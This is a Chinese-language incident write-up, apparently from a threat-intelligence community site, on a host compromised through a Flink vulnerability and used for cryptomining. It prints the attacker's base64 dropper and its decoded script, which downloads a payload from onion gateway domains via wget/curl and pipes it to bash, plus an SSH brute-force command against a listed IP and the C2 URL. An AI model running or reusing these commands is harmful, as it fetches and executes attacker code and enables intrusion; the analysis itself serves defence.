爆破 web应用漏洞利用
利用flink漏洞进行挖矿
weiwhy 2019-11-14 00:00:24 2230人浏览

image.png

初步确认利用flink漏洞进行远程控制来挖矿的

sh -c echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10b3JudHBheG53Nnl4aGw0CnUoKSB7CmY9L2NtZAp3Z2V0IC10MSAtVDE4MCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJGYgfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSRmCn0KKAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC50b3Iyd2ViLnRvIHx8CnUgJHQub25pb24uc2ggfHwKdSAkdC5vbmlvbi5pbi5uZXQgfHwKdSAkdC50b3Iyd2ViLmlvIHx8CnUgJHQuNHRvci5tbCB8fAp1ICR0Lm9uaW9uLnRvCil8YmFzaAo= |base64 -d|bash

解出来就是

exec &>/dev/null

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

t=torntpaxnw6yxhl4

u() {

f=/cmd

wget -t1 -T180 -qU- -O- --no-check-certificate $1$f || curl -m180 -fsSLkA- $1$f

}

(

u $t.onion.glass ||

u $t.civiclink.network ||

u $t.tor2web.to ||

u $t.onion.sh ||

u $t.onion.in.net ||

u $t.tor2web.io ||

u $t.4tor.ml ||

u $t.onion.to

)|bash

然后继续解这个脚本

wget -t1 -T180 -qU- -O- --no-check-certificate torntpaxnw6yxhl4.onion.glass/cmd || curl -m180 -fsSLkA- torntpaxnw6yxhl4.onion.glass/cmd

wget -t1 -T180 -qU- -O- --no-check-certificate torntpaxnw6yxhl4.civiclink.network/cmd || curl -m180 -fsSLkA- torntpaxnw6yxhl4.onion.glass/cmd

wget -t1 -T180 -qU- -O- --no-check-certificate torntpaxnw6yxhl4.tor2web.to/cmd || curl -m180 -fsSLkA- torntpaxnw6yxhl4.onion.glass/cmd

wget -t1 -T180 -qU- -O- --no-check-certificate torntpaxnw6yxhl4.onion.in.net/cmd || curl -m180 -fsSLkA- torntpaxnw6yxhl4.onion.glass/cmd

反正就是下载一个脚本,然后执行的意思。。

————————————————————————————————

接下来就是一个很奇怪的东西,我也看不懂在干啥。。

timeout 1h ./ssh 47.90.76.41 22 root ./pw

但是我找到了这个目录,看下图

image.png

看目录的话应该是攻击者留下的吧

所以还是老规矩,先取样本回来

————————————————————————————

原谅我比较菜

ip这个文件是个文本文件,中的文件内容是这样的

image.png

net的文件内容是这样的

image.png

pw看上去是一个字典的东西

image.png

ss和ssh都是可执行文件

所以,基本上可以确定的是,这些是横向扩散的爆破用的工具

./ssh 47.90.76.41 22 root ./pw是在爆破密码

鉴于今天爆出的flink漏洞,和当前主机中招的用户,基本可以断定攻击者利用flink进行攻击的。

然后看下挖矿脚本的运行时间的话

image.png

Nov09,,也就是11月9号吧

吹水这么多了,好像还没见正主呢,挖矿程序内?

image.png

其实是没了。。

image.png


不过可惜啊,,没能揪出来,,关键内容,起始脚本文件也没了

https://torntpaxnw6yxhl4.civiclink.network/cmd

image.png

总感觉事情没有那么简单,于是。。。。

image.png

好吧,,,

image.png

ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
域名(1) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
Hash(1) 检测结果 关联样本 微步标签 单独价格 全部 < 1/1 >
匿名用户 2019-11-15 16:08:54 回复
以前也发现过用docker yarn未授权访问挖矿,传播能力比较强,多种传播手段
匿名用户 2019-11-14 15:59:55 回复
小司马大佬牛皮
匿名用户 2019-11-14 10:12:33 回复
这个挖矿僵尸网络挺猖獗的,